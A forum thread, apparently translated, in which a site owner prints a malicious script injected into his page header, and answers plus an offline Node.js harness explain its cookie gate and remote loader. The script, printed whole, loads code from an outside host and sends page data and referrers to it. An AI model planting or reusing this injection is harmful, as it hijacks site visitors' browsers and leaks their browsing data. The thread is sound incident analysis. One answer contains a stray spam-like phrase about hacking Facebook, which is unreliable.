Website hacking with a script that references another site

47

Recently my site was hacked: the attackers managed to upload a webshell to the site. However, everything was brought under control and the site is safe again.

Now ESET NOD32 has detected a trojan, FakeJquery; investigating a bit, I could see that the following script had been inserted in the header of the page:

<script>
    var a = '';    // unused: shadowed by the parameter of the same name below
    setTimeout(1); // no effect (the argument is not a function)

    // Writes cookie a=b, expiring c hours from now
    function setCookie(a, b, c) {
        var d = new Date;
        d.setTime(d.getTime() + 60 * c * 60 * 1e3);
        var e = "expires=" + d.toUTCString();
        document.cookie = a + "=" + b + "; " + e
    }

    // Returns the value of cookie a as a string, or null when it is not set
    function getCookie(a) {
        for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c.length; d++) {
            for (var e = c[d]; " " == e.charAt(0);) e = e.substring(1);
            if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
        }
        return null
    }

    // Runs only while the __cfgoid cookie is absent: sets it to 1, checks it
    // back (1 == "1" is true with loose comparison), sets it to 2 and then
    // writes a <script> tag that loads a "jquery" file from a foreign host,
    // passing this page's host, URL, keywords (or utm_term, or title) and
    // referrer in the query string. The closing tag is split as '<' + '/script>'
    // so that it does not terminate the outer <script> block.
    null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 ==
        getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write(
            '<script type="text/javascript" src="' +
            'http://crazytime.home.pl/js/jquery.min.php' + '?key=b64' +
            '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host +
            '&utm_medium=' + '&utm_content=' + window.location +
            '&utm_term=' + encodeURIComponent(
                ((k = (function() {
                        // Concatenates the content of every <meta name="keywords">
                        var keywords = '';
                        var metas = document.getElementsByTagName('meta');
                        if (metas) {
                            for (var x = 0, y = metas.length; x < y; x++) {
                                if (metas[x].name.toLowerCase() == "keywords") {
                                    keywords += metas[x].content;
                                }
                            }
                        }
                        return keywords !== '' ? keywords : null;
                    })()) == null ? (v = window.location.search.match(
                        /utm_term=([^&]+)/)) == null ? (t = document.title) == null ?
                    '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(
                document.referrer) + '"><' + '/script>')));
</script>

From what I understand, the previous script is generating traffic to an external site.

I've already removed all this code from the site, but I'm left wondering what this code really does.

My question is: Am I right in thinking that traffic is being generated to an external site, or does the code shared above do something extra?

asked by Juan Pinzón 17.10.2016 at 23:59

3 answers

56

You have been a victim of Black Hat SEO, and I think more specifically of the technique of keyword spamming, which consists of filling the content of a website with keywords, spamming said content. This is also known as keyword stuffing or spamdexing.

All these techniques aim to alter the ranking of the site in search engines, and this is a double-edged sword, because search engines have tools to detect such spam and can remove your page from the ranking as a result.

Many search engines check for spamdexing and remove suspicious pages from their indexes.

This part:

document.write('<script type="text/javascript" src="' +

     /**** This is the URL the traffic goes to ****/

     'http://crazytime.home.pl/js/jquery.min.php' + 

     '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' +
      window.location.host + '&utm_medium=' + '&utm_content=' + 
      window.location + '&utm_term=' ..........

You are creating a script that will try to load an external page, using the keywords and even the title of your own page and passing them as parameters in the query string.

This fragment proves it:

<!DOCTYPE html>
<html>

<head>
  <meta name="keywords" content="hello world">
  <meta name="keywords" content="hola mundo">
</head>

<body>
  <script>
    // Concatenates the content of every <meta name="keywords"> tag on the page
    var k = (function() {
      var keywords = '';
      var metas = document.getElementsByTagName('meta');
      if (metas) {
        for (var x = 0, y = metas.length; x < y; x++) {
          if (metas[x].name.toLowerCase() == "keywords") {
            keywords += metas[x].content;
          }
        }
      }
      return keywords !== '' ? keywords : null;
    })();

    console.log(k); // "hello worldhola mundo"
  </script>
</body>

</html>

You are also reading the referrer of your page and sending it:

'&se_referrer=' + encodeURIComponent(document.referrer);

Finally, and most importantly, you are storing a cookie ("__cfgoid") in the browsers of the people who use your site.

function setCookie(a, b, c) {
  var d = new Date;
  d.setTime(d.getTime() + 60 * c * 60 * 1e3);
  var e = "expires=" + d.toUTCString();
  document.cookie = a + "=" + b + "; " + e
}

I recommend that, now that you have contained the threat, you write another script to clear that cookie.

answered by 18.10.2016 / 00:44
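The cookie gate and the query string that the answer above walks through, run offline. This is an added example written for this page, not code from the question or from the answerer: it feeds the injected script's helpers a stand-in for `document` with an adjustable clock (test scaffolding) and a made-up `page` object; the cookie name, loader URL and parameter names are the ones that appear in the question.

```javascript
// Added example, not part of the original question or answer: an offline
// harness that runs the injected script's cookie gate against a stubbed
// `document`, so its once-per-hour behaviour and the data it sends can be
// observed in Node.js without a browser. Assumed: the constants below are
// copied from the script in the question; the stub, the movable clock and
// the `page` object are test scaffolding.
const COOKIE_NAME = '__cfgoid';
const LOADER_URL = 'http://crazytime.home.pl/js/jquery.min.php';

// Stand-in for `document` with a cookie jar that honours `expires=`.
// `clockOffsetMs` moves the clock forward without touching the system time.
function makeDocStub() {
  const jar = new Map(); // cookie name -> { value, expiresMs }
  return {
    clockOffsetMs: 0,
    now() { return Date.now() + this.clockOffsetMs; },
    get cookie() {
      const t = this.now();
      return [...jar].filter(([, c]) => c.expiresMs > t)
        .map(([k, c]) => k + '=' + c.value).join('; ');
    },
    set cookie(str) {
      const [pair, ...attrs] = str.split(';').map((s) => s.trim());
      const eq = pair.indexOf('=');
      const exp = attrs.find((a) => /^expires=/i.test(a));
      jar.set(pair.slice(0, eq), {
        value: pair.slice(eq + 1),
        expiresMs: exp ? Date.parse(exp.slice(8)) : Infinity,
      });
    },
  };
}

// The injected script's helpers, with `document` passed in. `c` is hours.
function setCookie(doc, a, b, c) {
  const d = new Date(doc.now());
  d.setTime(d.getTime() + 60 * c * 60 * 1e3);
  doc.cookie = a + '=' + b + '; expires=' + d.toUTCString();
}
function getCookie(doc, a) {
  for (const part of doc.cookie.split(';')) {
    const e = part.trim();
    if (e.indexOf(a + '=') === 0) return e.substring(a.length + 1);
  }
  return null;
}

// The gate: true when this visit would document.write() the remote loader.
// getCookie returns the string "1"; the script's loose `1 == "1"` is what
// lets the second branch run on the very first visit.
function gateFires(doc) {
  if (getCookie(doc, COOKIE_NAME) !== null) return false;
  setCookie(doc, COOKIE_NAME, 1, 1);
  if (1 == getCookie(doc, COOKIE_NAME)) {
    setCookie(doc, COOKIE_NAME, 2, 1);
    return true;
  }
  return false;
}

// One visitor loading the page at the given minute offsets: the loader is
// requested on the first visit and then not again until the cookie expires,
// which is why simply reloading the page rarely reproduces the request.
function simulateVisits(minuteOffsets) {
  const doc = makeDocStub();
  return minuteOffsets.map((m) => {
    doc.clockOffsetMs = m * 60 * 1e3;
    return { minute: m, fired: gateFires(doc), cookie: getCookie(doc, COOKIE_NAME) };
  });
}

// The URL the written <script src> requests, given the page state the script
// reads. Precedence for utm_term is the original's: <meta name="keywords">
// content, else utm_term from the query string, else <title>.
function buildLoaderUrl(page) {
  const m = page.search.match(/utm_term=([^&]+)/);
  const term = page.metaKeywords.join('') || (m ? m[1] : page.title || '');
  return LOADER_URL + '?key=b64&utm_campaign=I92930' +
    '&utm_source=' + page.host +
    '&utm_medium=&utm_content=' + page.href +
    '&utm_term=' + encodeURIComponent(term) +
    '&se_referrer=' + encodeURIComponent(page.referrer);
}

console.log(simulateVisits([0, 5, 59, 61, 125]));
console.log(buildLoaderUrl({ host: 'example.test', href: 'http://example.test/', search: '',
  title: 'Home', metaKeywords: ['hello world', 'hola mundo'], referrer: 'https://search.example/' }));
```

Running it with Node shows the loader being requested on the first visit and then again only once the one-hour cookie has lapsed, so a site owner who reloads the page to "see the request" usually sees nothing; clearing `__cfgoid` or using a fresh private window reproduces it. The second line shows everything that leaves the site in the query string: host, full URL, keywords (or utm_term, or title) and the referrer.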
17

Use this: link. It will let you scan malicious files and URLs that create malware or other unsafe things.

The funny thing is that the URL had already been analyzed; initially it gave me:

URL already analyzed

This URL was last analyzed by VirusTotal on 2016-01-01 07:12:28 UTC; it was first analyzed by VirusTotal on 2016-01-01 07:12:28 UTC.

Detection ratio: 0/66

You can take a look at the last analysis or analyze it again.

However when analyzing again:

URL:    http://crazytime.home.pl/js/jquery.min.php
Detection ratio:    1 / 68
Analysis date:  2016-10-17 22:27:58 UTC ( 0 minutes ago )
File scan:  Go to downloaded file analysis

Result:

link

Now, on the other hand, keep this utility at hand in public_html: link

answered by 18.10.2016 at 00:32
2

The attack you suffered is that they uploaded a PHP file and are sending the traffic of your website to third parties (advertising or otherwise). I recommend you check all the permissions of the folders on your server to verify whether some folder is writable, because that is where they are uploading files and carrying out the attack from. It happened to me once on hack facebook without programs, and I had to set all the permissions on my server. Since I had problems with the permissions, that's why I tell you to start there.

answered by 09.02.2017 at 23:55